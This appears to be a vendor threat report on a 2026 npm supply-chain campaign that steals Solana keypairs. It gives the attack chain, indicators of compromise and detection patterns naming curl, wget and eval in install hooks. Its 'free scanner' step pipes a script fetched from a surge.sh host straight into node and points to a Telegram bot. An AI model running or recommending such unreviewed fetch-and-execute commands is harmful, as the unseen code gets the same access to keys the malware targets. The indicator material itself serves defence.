GlassWorm Technical IOC Report: Hunt This Malware in Your npm Project

SolGuard Security

GlassWorm is a supply chain malware campaign active since March 2026 that has compromised 400+ repositories and infected npm packages with 134,887 combined monthly downloads. This report covers detection indicators, attack chain, and free scanning tools.

Attack Chain Summary

1. The attacker publishes a malicious npm package (or compromises an existing one through a maintainer account takeover)

2. The package carries backdoored code hidden with invisible Unicode control characters (U+200B zero-width space, U+FEFF byte order mark, U+200C zero-width non-joiner), so the payload does not show when the source is read

3. On install, a postinstall lifecycle script scans the machine for Solana keypair files (~/.config/solana/id.json and similar paths)

4. The keypair data is base64-encoded and exfiltrated in a Solana memo program transaction, so the blockchain itself serves as the C2 channel

5. The attacker's monitoring script watches for incoming memo transactions and decodes the stolen keypairs; whoever holds the secret key controls the wallet

Why Traditional Detection Fails

• Antivirus: the malicious code is hidden with invisible Unicode, so to a signature-based static scanner it looks like ordinary source

• Network monitoring: exfiltration goes to Solana RPC endpoints, which is indistinguishable from normal blockchain traffic on a developer machine

• DNS/IP blocking: the malware uses public Solana RPC nodes, and blocking them also breaks legitimate Solana development

• Code review: invisible characters do not render in most editors unless highlighting is enabled (in VS Code, editor.unicodeHighlight.invisibleCharacters), and plain git diff output in a terminal shows nothing at all

Indicators of Compromise (IOCs)

File-level indicators:

• Presence of U+200B, U+FEFF or U+200C in .js/.ts files, especially inside string literals or identifiers (a U+FEFF as the very first character of a file is an ordinary byte order mark; the same character anywhere else is the indicator)

• Lifecycle scripts in package.json (preinstall, install, postinstall, prepare) that reference fs, os.homedir(), process.env.HOME or $HOME

• Dynamic require() or eval() calls in build scripts, particularly with arguments assembled at runtime

• Outbound network calls (curl, wget, fetch, http/https requests) in lifecycle scripts

Blockchain-level indicators:

• Memo program transactions from a Solana address that its owner did not initiate

• Memo data matching the base64 pattern ^[A-Za-z0-9+/]{40,}={0,2}$ (a raw 64-byte keypair encodes to 88 characters; the JSON array form of id.json to a few hundred)

• Memo transactions sent at hours the owner is not active, or in clusters seconds apart (bulk exfiltration pattern)

• Multiple small-SOL transactions to unknown addresses (possible key-verification pings)

Detection: Free Local Scanner

The report offers this one-liner for any machine on which npm packages have been installed since March 2026:

node -e "$(curl -s https://solguard-security-monitor.surge.sh/scan.js)"

Fetch the script to a file first, read it, and run that reviewed copy rather than piping the download straight into node: a remote script executed unseen has exactly the access to keypair files that GlassWorm is after, and a changed or hijacked download would run with it.

What it checks:

• package.json and package-lock.json for suspicious postinstall scripts

• node_modules for invisible Unicode characters in JS files

• VS Code extension directory for compromised extensions

• Local Solana keypair files and their last-modified timestamps

The scanner is described as open source, running locally with no install step and nothing leaving your machine; the fetched copy is where to confirm that before it runs.

Detection: Blockchain C2 Scanner

To check if a Solana address has been used as a GlassWorm C2 channel or if your wallet has suspicious memo transactions:

1. Open Telegram and search for @SolGuard_Bot

2. Send: /glassworm <your-solana-address>

3. The scanner checks: memo transaction patterns, timing anomalies, known malicious addresses, encoded data signatures

Free to use, no account required. The bot needs only the public address; never send a seed phrase or keypair file to any scanner, bot or support channel.

Timeline

• March 1-15, 2026: Initial npm package compromises. React Native ecosystem packages affected.

• March 16-31, 2026: Campaign expands to PyPI and VS Code extensions. 400+ repos compromised.

• April 2026: Still active. Not all infected packages have been removed from the npm registry.

Immediate Actions

1. Run the local scanner (after reading the fetched copy of the script)

2. If you hold Solana, move funds to a fresh keypair generated on a clean, ideally air-gapped, machine, and treat the old keypair as burned even if its balance is untouched

3. Audit package.json and lockfile dependencies added or updated since March 1, 2026, and until the tree is clean install with lifecycle scripts disabled (npm install --ignore-scripts, or npm config set ignore-scripts true) so no install hook can run

4. Run npm audit for known malicious or vulnerable versions, remembering that it only reports packages that already have a published advisory

5. Enable Solana wallet monitoring: @SolGuard_Bot /watch <address>

Sources: BleepingComputer, The Hacker News, Dark Reading (March-April 2026 coverage)
